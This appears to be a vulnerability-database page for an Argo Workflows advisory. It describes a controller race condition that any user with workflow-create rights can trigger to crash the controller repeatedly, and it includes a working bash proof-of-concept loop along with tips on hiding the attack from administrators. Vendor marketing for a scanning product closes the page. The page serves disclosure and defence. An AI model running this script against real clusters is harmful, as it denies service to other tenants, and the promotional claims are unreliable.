GHSA-ghjw-32xw-ffwr
MEDIUMArgo Workflows Controller: Denial of Service via malicious daemon Workflows
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
github.com/argoproj/argo-workflows/v3Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
Due to a race condition in a global variable, the argo workflows controller can be made to crash on-command by any user with access to execute a workflow.
This was resolved by https://github.com/argoproj/argo-workflows/pull/13641
Details
These two lines introduce a data race in the underlying SPDY implementation of the Kubernetes API client. If a second request is made before the first completes, it results in a panic due to a null pointer.
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L49
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L75
This appears to have been added in this commit https://github.com/argoproj/argo-workflows/commit/9756babd0ed589d1cd24592f05725f748f74130b / #13265 / v3.6.0-rc1
PoC
With the KUBECONFIG variable set to an appropriate file with create permissions for the Workflow kind, execute the following bash script:
#!/bin/bash -xeu
while true ; do
name=$(
{ argo submit /dev/stdin <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
generateName: curl-
spec:
entrypoint: main
templates:
- name: main
dag:
tasks:
- name: no-op
template: no-op
withSequence:
count: 3
- name: no-op
daemon: true
container:
image: alpine:3.13
command: [sleep, infinity]
EOF
} | head -n1 | awk '{ print $2 }'
)
( sleep 30; argo terminate $name ) &
sleep 15
done
This script creates, and subsequently cleans up, multiple daemon pods in rapid succession. Each pod cleanup involves executing a kill instruction using the Kubernetes exec API, triggering the conditions for the panic. This can be seen when the tests mark the pods as complete, but the workflow itself never completes. Observing the controller logs when this happens shows the panic and restart of the controller every few seconds. In a setup with exponential backoff (e.g. a Kubernetes Pod) this is enough to reliably cause crashes enough to extend this backoff significantly and leave other workflows stalled.
Because the restarted controller believes it has sent the kill signal, it will wait indefinitely for the pod to terminate, which it never will, so the attack must constantly garbage-collect its own workflows with the argo terminate command, otherwise the maximum concurrently running workflows will be reached. A more sophisticated attack could detect when the workflow has been signaled to clean up and terminate it then instead of relying on a simple timer.
Impact
A malicious user with access to create workflows can continually submit workflows that do nothing except create and then clean up multiple daemon pods, resulting in a crash-loop that prevents other users' workflows from running. This can be done with only a handful of pods and very little cpu and memory, meaning typical multi-tenant Kubernetes controls such as Pod count and resource quotas are not effective at preventing it.
Because the panic log does not in any way suggest that the issue has anything to do with the daemon pods, and an attacker could easily disguise these daemon pods as part of a genuine workflow, it would be difficult for administrators to discover the root cause of the DoS and the individuals responsible to remove their access.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/argoproj/argo-workflows/v3 | ≥ 3.6.0-rc1&&< 3.6.0-rc2 | 3.6.0-rc2 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/argoproj/argo-workflows/v3. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/argoproj/argo-workflows/v3 to 3.6.0-rc2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-ghjw-32xw-ffwr is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-ghjw-32xw-ffwr is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-ghjw-32xw-ffwr. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-ghjw-32xw-ffwr in your dependencies?
O3 detects GHSA-ghjw-32xw-ffwr across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.